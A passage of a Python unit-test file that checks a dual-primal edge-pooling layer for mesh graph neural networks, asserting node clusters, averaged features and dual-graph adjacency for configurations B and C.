self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (4, 6)
other_dual_nodes = [(0, 4), (0, 6), (1, 4), (4, 7), (5, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (4, 7)
other_dual_nodes = [(0, 4), (1, 4), (3, 7), (4, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (5, 6)
other_dual_nodes = [(0, 6), (2, 5), (3, 5), (4, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (6, 7)
other_dual_nodes = [(0, 6), (3, 7), (4, 6), (4, 7), (5, 6)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
def __test_config_B_with_output_self_loops_nonconsecutive(
self, use_decreasing_attention_coefficient=True, num_heads=1):
# - Dual-graph configuration B.
single_dual_nodes = False
undirected_dual_edges = True
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
self.assertNotEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, hence each node in the dual graph has 4 incoming edges
# and 4 outgoing edges. However, since there are no self-loops in the
# dual graph, each incoming edge for a certain dual node is also an
# outgoing edge for another dual node, and the total number of
# (directed) edges in the dual graph is 4 times the number of dual
# nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 4)
self.assertEqual(num_dual_nodes, num_primal_edges)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so that the primal edges have
# associated attention coefficients in this order:
# - 4->13 / 13->4;
# - 10->11 / 11->10;
# - 0->10 / 10->0 [not pooled, because 10->11 / 11->10 was pooled];
# - 2->3 / 3->2;
# - 3->8 / 8->3 [not pooled, because 2->3 / 3->2 was pooled];
# - 6->7 / 7->6;
# - 1->5 / 5->1;
# - 7->11 / 11->7 [not pooled, because 10->11 / 11->10 and 6->7 / 7->6
# were pooled];
# - 1->2 / 2->1 [not pooled, because 2->3 / 3->2 and 1->5 / 5->1 were
# pooled];
# - 8->9 / 9->8;
# - ... [other edges that are not pooled]
# (cf. file `../../common_data/simple_mesh_large_pool_2.png`)
attention_threshold = 0.5
edges_to_pool = [[8, 9], [1, 2], [7, 11], [1, 5], [6, 7], [3, 8],
[2, 3], [0, 10], [10, 11], [4, 13]]
if (use_decreasing_attention_coefficient):
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = attention_threshold + (
1 - attention_threshold) * (
float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool))
else:
primal_attention_coeffs = attention_threshold + torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * (1 - attention_threshold)
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = (
attention_threshold - attention_threshold *
(float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool)))
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=True,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=15,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
allow_pooling_consecutive_edges=False,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 8)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [2, 3]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node in [6, 7]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node in [8, 9]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
elif (old_primal_node in [10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 6)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 7)
# - Check that the features of each new primal node correspond to the
# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [
0, [1, 5], [2, 3], [4, 13], [6, 7], [8, 9], [10, 11], 12
]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->6 / 6->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 1->4 / 4->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->5 / 5->3;
# - 3->7 / 7->3;
# - 4->6 / 6->4;
# - 4->7 / 7->4;
# - 5->6 / 6->5;
# - 6->7 / 7->6.
self.assertEqual(num_new_primal_edges, 28)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 6], [1, 2], [1, 3], [1, 4],
[2, 3], [2, 5], [3, 5], [3, 7], [4, 6], [4, 7],
[5, 6], [6, 7]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are associated to the same dual
# node.
self.assertNotEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 2--5, in both directions.
# - New (directed) primal edge 2->5 corresponds to old (directed)
# primal edges 2->9 and 3->8.
idx_new_dual_node = new_petdni_batch[(2, 5)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(3, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 5->2 corresponds to old (directed)
# primal edges 9->2 and 8->3.
idx_new_dual_node = new_petdni_batch[(5, 2)]
idx_old_dual_node_1 = petdni_batch[(9, 2)]
idx_old_dual_node_2 = petdni_batch[(8, 3)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 1), (0, 4), (0, 6), (1, 2), (1, 3), (1, 4),
(2, 3), (3, 5), (3, 7), (4, 6), (4, 7), (5, 6),
(6, 7)]
old_dual_nodes = [(0, 1), (0, 7), (0, 10), (1, 2), (5, 4), (5, 6),
(3, 4), (13, 8), (13, 12), (7, 11), (6, 12), (9, 10),
(11, 12)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
# 'Forward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# 'Backward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node[::-1]]
idx_old_dual_node = petdni_batch[old_dual_node[::-1]]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 7), (0, 10), (1, 2), (2, 9), (3, 4),
(3, 8), (4, 5), (5, 6), (6, 12), (7, 11),
(8, 13), (9, 10), (11, 12), (12, 13)]
] + [
petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (0, 7), (0, 10), (1, 2), (2, 9), (3, 4),
(3, 8), (4, 5), (5, 6), (6, 12), (7, 11),
(8, 13), (9, 10), (11, 12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 4), (0, 6), (1, 2), (2, 5), (2, 3),
(2, 5), (3, 1), (1, 4), (4, 7), (4, 6), (5, 3),
(5, 6), (6, 7), (7, 3)]
] + [
new_petdni_batch[primal_edge[::-1]]
for primal_edge in [(0, 1), (0, 4), (0, 6), (1, 2), (2, 5), (2, 3),
(2, 5), (3, 1), (1, 4), (4, 7), (4, 6), (5, 3),
(5, 6), (6, 7), (7, 3)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set), plus the self-loops:
# - (0->1) -> (1->2);
# - (0->1) -> (1->3);
# - (0->1) -> (1->4);
# - (0->1) -> (4->0);
# - (0->1) -> (6->0);
# - (1->0) -> (2->1);
# - (1->0) -> (3->1);
# - (1->0) -> (4->1);
# - (1->0) -> (0->4);
# - (1->0) -> (0->6);
# - (0->4) -> (4->1);
# - (0->4) -> (4->6);
# - (0->4) -> (4->7);
# - (0->4) -> (1->0);
# - (0->4) -> (6->0);
# - (4->0) -> (1->4);
# - (4->0) -> (6->4);
# - (4->0) -> (7->4);
# - (4->0) -> (0->1);
# - (4->0) -> (0->6);
# - (0->6) -> (6->4);
# - (0->6) -> (6->5);
# - (0->6) -> (6->7);
# - (0->6) -> (1->0);
# - (0->6) -> (4->0);
# - (6->0) -> (4->6);
# - (6->0) -> (5->6);
# - (6->0) -> (7->6);
# - (6->0) -> (0->1);
# - (6->0) -> (0->4);
# - (1->2) -> (2->3);
# - (1->2) -> (2->5);
# - (1->2) -> (0->1);
# - (1->2) -> (3->1);
# - (1->2) -> (4->1);
# - (2->1) -> (3->2);
# - (2->1) -> (5->2);
# - (2->1) -> (1->0);
# - (2->1) -> (1->3);
# - (2->1) -> (1->4);
# - (1->3) -> (3->2);
# - (1->3) -> (3->5);
# - (1->3) -> (3->7);
# - (1->3) -> (0->1);
# - (1->3) -> (2->1);
# - (1->3) -> (4->1);
# - (3->1) -> (2->3);
# - (3->1) -> (5->3);
# - (3->1) -> (7->3);
# - (3->1) -> (1->0);
# - (3->1) -> (1->2);
# - (3->1) -> (1->4);
# - (1->4) -> (4->0);
# - (1->4) -> (4->6);
# - (1->4) -> (4->7);
# - (1->4) -> (0->1);
# - (1->4) -> (2->1);
# - (1->4) -> (3->1);
# - (4->1) -> (0->4);
# - (4->1) -> (6->4);
# - (4->1) -> (7->4);
# - (4->1) -> (1->0);
# - (4->1) -> (1->2);
# - (4->1) -> (1->3);
# - (2->3) -> (3->1);
# - (2->3) -> (3->5);
# - (2->3) -> (3->7);
# - (2->3) -> (1->2);
# - (2->3) -> (5->2);
# - (3->2) -> (1->3);
# - (3->2) -> (5->3);
# - (3->2) -> (7->3);
# - (3->2) -> (2->1);
# - (3->2) -> (2->5);
# - (2->5) -> (5->3);
# - (2->5) -> (5->6);
# - (2->5) -> (1->2);
# - (2->5) -> (3->2);
# - (5->2) -> (3->5);
# - (5->2) -> (6->5);
# - (5->2) -> (2->1);
# - (5->2) -> (2->3);
# - (3->5) -> (5->2);
# - (3->5) -> (5->6);
# - (3->5) -> (1->3);
# - (3->5) -> (2->3);
# - (3->5) -> (7->3);
# - (5->3) -> (2->5);
# - (5->3) -> (6->2);
# - (5->3) -> (3->1);
# - (5->3) -> (3->2);
# - (5->3) -> (3->7);
# - (3->7) -> (7->4);
# - (3->7) -> (7->6);
# - (3->7) -> (1->3);
# - (3->7) -> (2->3);
# - (3->7) -> (5->3);
# - (7->3) -> (4->7);
# - (7->3) -> (6->7);
# - (7->3) -> (3->1);
# - (7->3) -> (3->2);
# - (7->3) -> (3->5);
# - (4->6) -> (6->0);
# - (4->6) -> (6->5);
# - (4->6) -> (6->7);
# - (4->6) -> (0->4);
# - (4->6) -> (1->4);
# - (4->6) -> (7->4);
# - (6->4) -> (0->6);
# - (6->4) -> (5->6);
# - (6->4) -> (7->6);
# - (6->4) -> (4->0);
# - (6->4) -> (4->1);
# - (6->4) -> (4->7);
# - (4->7) -> (7->3);
# - (4->7) -> (7->6);
# - (4->7) -> (0->4);
# - (4->7) -> (1->4);
# - (4->7) -> (6->4);
# - (7->4) -> (3->7);
# - (7->4) -> (6->7);
# - (7->4) -> (4->0);
# - (7->4) -> (4->1);
# - (7->4) -> (4->6);
# - (5->6) -> (6->0);
# - (5->6) -> (6->4);
# - (5->6) -> (6->7);
# - (5->6) -> (2->5);
# - (5->6) -> (3->5);
# - (6->5) -> (0->6);
# - (6->5) -> (4->6);
# - (6->5) -> (7->6);
# - (6->5) -> (5->2);
# - (6->5) -> (5->3);
# - (6->7) -> (7->3);
# - (6->7) -> (7->4);
# - (6->7) -> (0->6);
# - (6->7) -> (4->6);
# - (6->7) -> (5->6).
# - (7->6) -> (3->7);
# - (7->6) -> (4->7);
# - (7->6) -> (6->0);
# - (7->6) -> (6->4);
# - (7->6) -> (6->5).
self.assertEqual(num_new_dual_edges, 144 + num_new_dual_nodes)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_to_neighbors = {
(0, 1): [(1, 2), (1, 3), (1, 4), (4, 0), (6, 0)],
(0, 4): [(4, 1), (4, 6), (4, 7), (1, 0), (6, 0)],
(0, 6): [(6, 4), (6, 5), (6, 7), (1, 0), (4, 0)],
(1, 2): [(2, 3), (2, 5), (0, 1), (3, 1), (4, 1)],
(1, 3): [(3, 2), (3, 5), (3, 7), (0, 1), (2, 1), (4, 1)],
(1, 4): [(4, 0), (4, 6), (4, 7), (0, 1), (2, 1), (3, 1)],
(2, 3): [(3, 1), (3, 5), (3, 7), (1, 2), (5, 2)],
(2, 5): [(5, 3), (5, 6), (1, 2), (3, 2)],
(3, 5): [(5, 2), (5, 6), (1, 3), (2, 3), (7, 3)],
(3, 7): [(7, 4), (7, 6), (1, 3), (2, 3), (5, 3)],
(4, 6): [(6, 0), (6, 5), (6, 7), (0, 4), (1, 4), (7, 4)],
(4, 7): [(7, 3), (7, 6), (0, 4), (1, 4), (6, 4)],
(5, 6): [(6, 0), (6, 4), (6, 7), (2, 5), (3, 5)],
(6, 7): [(7, 3), (7, 4), (0, 6), (4, 6), (5, 6)]
}
for new_dual_node, other_dual_nodes in dual_node_to_neighbors.items():
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[new_dual_node],
new_petdni_batch[other_dual_node]
] in new_dual_edge_index_list)
# - Self-loop.
self.assertTrue([
new_petdni_batch[new_dual_node], new_petdni_batch[new_dual_node]
] in new_dual_edge_index_list)
# 'Opposite' dual node.
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[new_dual_node[::-1]], new_petdni_batch[
other_dual_node[::-1]]
] in new_dual_edge_index_list)
# - Self-loop of 'opposite' dual node.
self.assertTrue([
new_petdni_batch[new_dual_node[::-1]], new_petdni_batch[
new_dual_node[::-1]]
] in new_dual_edge_index_list)
def __test_config_C_with_output_self_loops_nonconsecutive(
self, use_decreasing_attention_coefficient=True, num_heads=1):
# - Dual-graph configuration C.
single_dual_nodes = False
undirected_dual_edges = False
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
self.assertNotEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, but by definition of dual-graph configuration C each
# node in the dual graph has 2 incoming edges and 2 outgoing edges.
# However, since there are no self-loops in the dual graph, each
# incoming edge for a certain dual node is also an outgoing edge for
# another dual node, and the total number of (directed) edges in the
# dual graph is 2 times the number of dual nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 2)
self.assertEqual(num_dual_nodes, num_primal_edges)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so that the primal edges have
# associated attention coefficients in this order:
# - 4->13 / 13->4;
# - 10->11 / 11->10;
# - 0->10 / 10->0 [not pooled, because 10->11 / 11->10 was pooled];
# - 2->3 / 3->2;
# - 3->8 / 8->3 [not pooled, because 2->3 / 3->2 was pooled];
# - 6->7 / 7->6;
# - 1->5 / 5->1;
# - 7->11 / 11->7 [not pooled, because 10->11 / 11->10 and 6->7 / 7->6
# were pooled];
# - 1->2 / 2->1 [not pooled, because 2->3 / 3->2 and 1->5 / 5->1 were
# pooled];
# - 8->9 / 9->8;
# - ... [other edges that are not pooled]
# (cf. file `../../common_data/simple_mesh_large_pool_2.png`)
attention_threshold = 0.5
edges_to_pool = [[8, 9], [1, 2], [7, 11], [1, 5], [6, 7], [3, 8],
[2, 3], [0, 10], [10, 11], [4, 13]]
if (use_decreasing_attention_coefficient):
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = attention_threshold + (
1 - attention_threshold) * (
float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool))
else:
primal_attention_coeffs = attention_threshold + torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * (1 - attention_threshold)
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = (
attention_threshold - attention_threshold *
(float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool)))
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=True,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=15,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
allow_pooling_consecutive_edges=False,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 8)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [2, 3]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node in [6, 7]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node in [8, 9]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
elif (old_primal_node in [10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 6)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 7)
# - Check that the features of each new primal node correspond to the
# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [
0, [1, 5], [2, 3], [4, 13], [6, 7], [8, 9], [10, 11], 12
]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->6 / 6->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 1->4 / 4->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->5 / 5->3;
# - 3->7 / 7->3;
# - 4->6 / 6->4;
# - 4->7 / 7->4;
# - 5->6 / 6->5;
# - 6->7 / 7->6.
self.assertEqual(num_new_primal_edges, 28)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 6], [1, 2], [1, 3], [1, 4],
[2, 3], [2, 5], [3, 5], [3, 7], [4, 6], [4, 7],
[5, 6], [6, 7]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are associated to the same dual
# node.
self.assertNotEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 2--5, in both directions.
# - New (directed) primal edge 2->5 corresponds to old (directed)
# primal edges 2->9 and 3->8.
idx_new_dual_node = new_petdni_batch[(2, 5)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(3, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - New (directed) primal edge 5->2 corresponds to old (directed)
# primal edges 9->2 and 8->3.
idx_new_dual_node = new_petdni_batch[(5, 2)]
idx_old_dual_node_1 = petdni_batch[(9, 2)]
idx_old_dual_node_2 = petdni_batch[(8, 3)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 1), (0, 4), (0, 6), (1, 2), (1, 3), (1, 4),
(2, 3), (3, 5), (3, 7), (4, 6), (4, 7), (5, 6),
(6, 7)]
old_dual_nodes = [(0, 1), (0, 7), (0, 10), (1, 2), (5, 4), (5, 6),
(3, 4), (13, 8), (13, 12), (7, 11), (6, 12), (9, 10),
(11, 12)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
# 'Forward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# 'Backward' edge.
idx_new_dual_node = new_petdni_batch[new_dual_node[::-1]]
idx_old_dual_node = petdni_batch[old_dual_node[::-1]]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
